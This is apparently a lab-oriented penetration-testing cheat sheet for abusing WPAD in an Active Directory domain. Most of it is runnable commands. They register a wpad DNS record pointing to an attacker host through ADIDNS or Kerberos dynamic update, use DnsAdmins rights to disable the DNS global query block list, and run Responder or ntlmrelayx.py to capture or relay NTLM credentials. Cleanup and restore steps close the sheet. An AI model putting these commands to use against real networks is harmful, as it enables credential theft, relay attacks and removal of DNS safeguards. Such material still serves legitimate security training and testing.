WPAD abuse turns name resolution into proxy auto-discovery control. If clients ask for wpad.domain.local and we make that name resolve to us, browsers and services may connect to our listener and authenticate. This becomes capture or relay depending on the listener.
Variables
export DOMAIN=ootw.local
export DC=10.10.10.200
export ATTACKER=10.10.10.100
export USER=student
export PASS='student'
Check whether WPAD already exists
dig @$DC wpad.$DOMAIN A +short
nslookup wpad.$DOMAIN $DC
Add WPAD with ADIDNS write
python3 dnstool.py -u "$DOMAIN\\$USER" -p "$PASS" --action add --record wpad --data $ATTACKER $DC
dig @$DC wpad.$DOMAIN A +short
Add WPAD with Kerberos dynamic update
nsupdate -g
server 10.10.10.200
zone ootw.local
update add wpad.ootw.local 60 A 10.10.10.100
send
quit
Start capture
sudo responder -I eth0 -w
Start relay instead of capture
ntlmrelayx.py -tf targets.txt -smb2support -wh wpad.ootw.local
If Responder is also used for poisoning, disable its SMB and HTTP listeners so they do not bind the same ports as ntlmrelayx.py.
DnsAdmins path when WPAD is blocked
Get-DnsServerGlobalQueryBlockList -ComputerName dc01.ootw.local
Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.ootw.local
Add-DnsServerResourceRecordA -Name wpad -ZoneName ootw.local -ComputerName dc01.ootw.local -IPv4Address 10.10.10.100
Verify from Windows
nslookup wpad.ootw.local 10.10.10.200
curl http://wpad.ootw.local/wpad.dat
Delete ADIDNS WPAD
python3 dnstool.py -u "$DOMAIN\\$USER" -p "$PASS" --action remove --record wpad $DC
Delete with PowerShell and restore block list
Remove-DnsServerResourceRecord -Name wpad -ZoneName ootw.local -ComputerName dc01.ootw.local -RRType A -Force
Set-DnsServerGlobalQueryBlockList -Enable $true -ComputerName dc01.ootw.local
Set-DnsServerGlobalQueryBlockList -List wpad,isatap -ComputerName dc01.ootw.local
Get-DnsServerGlobalQueryBlockList -ComputerName dc01.ootw.local
Notes
WPAD is high-impact because clients may ask for it automatically.
Modern environments often block WPAD at DNS through the global query block list.
DnsAdmins can remove that block and add the record.
WPAD does not guarantee credentials by itself. The client must connect, the listener must answer, and the authentication path must be accepted.
Relay value depends on the target protections, not on WPAD alone.